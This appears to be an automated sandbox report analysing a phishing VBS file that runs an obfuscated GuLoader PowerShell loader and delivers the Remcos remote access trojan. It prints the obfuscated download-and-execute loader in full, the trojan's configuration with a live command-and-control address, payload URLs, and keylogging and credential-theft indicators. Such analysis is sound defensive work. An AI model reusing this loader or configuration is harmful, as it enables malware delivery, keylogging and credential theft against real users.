00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2442003706.0000000005E33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2447423096.000000000B13D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_3528.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_1084.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xedc5:$b2: ::FromBase64String(
  • 0xde49:$s1: -join
  • 0x75f5:$s4: +=
  • 0x76b7:$s4: +=
  • 0xb8de:$s4: +=
  • 0xd9fb:$s4: +=
  • 0xdce5:$s4: +=
  • 0xde2b:$s4: +=
  • 0x17ebd:$s4: +=
  • 0x17f3d:$s4: +=
  • 0x18003:$s4: +=
  • 0x18083:$s4: +=
  • 0x18259:$s4: +=
  • 0x182dd:$s4: +=
  • 0xe672:$e4: Get-WmiObject
  • 0xe861:$e4: Get-Process
  • 0xe8b9:$e4: Start-Process
  • 0x18b4d:$e4: Get-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", ProcessId: 7160, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5652, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj", ProcessId: 3228, ProcessName: wab.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloF
                Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs", ProcessId: 7160, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloF

                Stealing of Sensitive Information

                Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5652, TargetFilename: C:\ProgramData\remcos\logs.dat
                No Snort rule has matched

                AV Detection

                Source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: http://103.237.86.247/mtyozjDM72.bin; Virustotal: Detection: 10%
                Source: http://103.237.86.247/acidizes.mso; Virustotal: Detection: 10%
                Source: PAYMENT - STATEMENT ADVISE.vbs; ReversingLabs: Detection: 37%
                Source: PAYMENT - STATEMENT ADVISE.vbs; Virustotal: Detection: 14%
                Source: Yara match; File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: indows\System.Core.pdb* source: powershell.exe, 00000005.00000002.2444255599.00000000076F9000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_240C10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 8_2_240C6580 FindFirstFileExA,8_2_240C6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Malware configuration extractor; URLs: 103.237.87.32
                Source: global traffic; TCP traffic: 192.168.2.5:64545 -> 103.237.87.32:1999
                Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
                Source: Joe Sandbox View; IP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox View; IP Address: 103.237.86.247 103.237.86.247
                Source: Joe Sandbox View; ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global traffic; HTTP traffic detected: GET /acidizes.mso HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: 103.237.86.247; Connection: Keep-Alive
                Source: global traffic; HTTP traffic detected: GET /mtyozjDM72.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: 103.237.86.247; Cache-Control: no-cache
                Source: unknown; TCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global traffic; DNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.2582058655.00000192819AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/a
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/ac
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/aci
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acid
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidi
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidiz
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidize
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.m
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.ms
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.mso
                Source: powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.msoP
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/acidizes.msoXR
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/mtyozjDM72.bin
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.237.86.247/mtyozjDM72.binW
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281E1A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.237H
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP
                Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ent
                Source: wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7cbb27807
                Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.com
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lBjq
                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
                Source: wab.exe; String found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
                Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: https://www.google.com
                Source: wab.exe; String found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 11_2_0041183A OpenClipboard,GetLastError,DeleteFileW,11_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_004072B5

                E-Banking Fraud

                Source: Yara match; File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_1084.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: PAYMENT - STATEMENT ADVISE.vbs; Static file information: Suspicious name
                Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 9337
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: Commandline size = 9337
